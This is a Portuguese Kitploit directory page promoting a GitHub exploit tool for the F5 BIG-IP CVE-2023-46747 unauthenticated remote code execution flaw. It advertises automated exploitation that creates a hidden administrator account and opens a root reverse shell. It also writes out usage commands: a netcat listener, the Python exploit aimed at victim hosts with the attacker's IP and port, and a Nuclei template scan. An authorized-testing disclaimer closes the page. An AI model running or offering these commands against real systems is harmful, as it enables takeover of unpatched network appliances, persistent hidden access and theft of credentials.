Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit — #F5-BIG-IP-CVE-2023-46747-Exploit – RCE não autenticada Exploit em Python & template Nuclei por Raguraman ✓ Shell reverso TCP automatizado (LHOST/LPORT) ✓ Testado em BIG-IP 13.x–17.x afetados ⚠️ Apenas para testes de pentest autorizados | Kitploit
Ferramentas/GitHubGitHub/razzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubrazzlemouse/f5-big-ip-smuggleshell-cve-2023-46747-exploit

F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit

#F5-BIG-IP-CVE-2023-46747-Exploit – RCE não autenticada Exploit em Python & template Nuclei por Raguraman ✓ Shell reverso TCP automatizado (LHOST/LPORT) ✓ Testado em BIG-IP 13.x–17.x afetados ⚠️ Apenas para testes de pentest autorizados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
41há 8 mesesAinda não revisado

F5 BIG-IP CVE-2023-46747 – RCE não autenticado + Reverse Shell

Versões Python3 e Nuclei – por raguraman

RCE crítico não autenticado (CVSS 9.8) via AJP + contrabando de requisições HTTP
Funciona em todos os BIG-IP sem patch 13.x → 17.x (incluindo o mais recente 17.1.0.3)
Patch: https://my.f5.com/manage/s/article/K000137353 (Novembro 2023)

Write-up de exploração em cenário real: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd

Funcionalidades

  • Completamente automatizado (sem etapas manuais)
  • Funciona com nome de domínio OU IP bruto
  • Cria um usuário administrador oculto
  • Reverse shell TCP instantânea (root)
  • Saída limpa com credenciais + token

Arquivos

  • f5-bigip-cve-2023-46747-revshell.py → Python3 autônomo (recomendado)
  • CVE-2023-46747-revshell.yaml → template Nuclei (opcional)

Uso – Python3 (mais rápido e confiável)

root@kitploit:~
# 1. Inicie seu listener
nc -lvnp 4444

# 2. Execute o exploit (funciona com IP ou domínio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50   SEU_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com SEU_IP 4444

# → Shell root instantâneo!

Uso – template Nuclei (alternativa)
Bash # 1. Edite LHOST e LPORT dentro do arquivo YAML
# 2. Inicie o listener
nc -lvnp 4444

# 3. Escaneie
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com



# Aviso Legal

Esta ferramenta destina-se exclusivamente a testes de segurança autorizados, tais como:

Compromissos de teste de penetração aprovados

Operações de equipe vermelha com permissão por escrito

Pesquisa em ambiente de laboratório controlado

Não utilize este exploit em sistemas que você não possui ou para os quais não possui permissão explícita para testar.
A exploração não autorizada é ilegal e pode resultar em processo criminal.

Ao usar esta ferramenta, você assume toda a responsabilidade pelo cumprimento das leis aplicáveis.
O autor não se responsabiliza por qualquer uso indevido ou dano.
Baixar ferramenta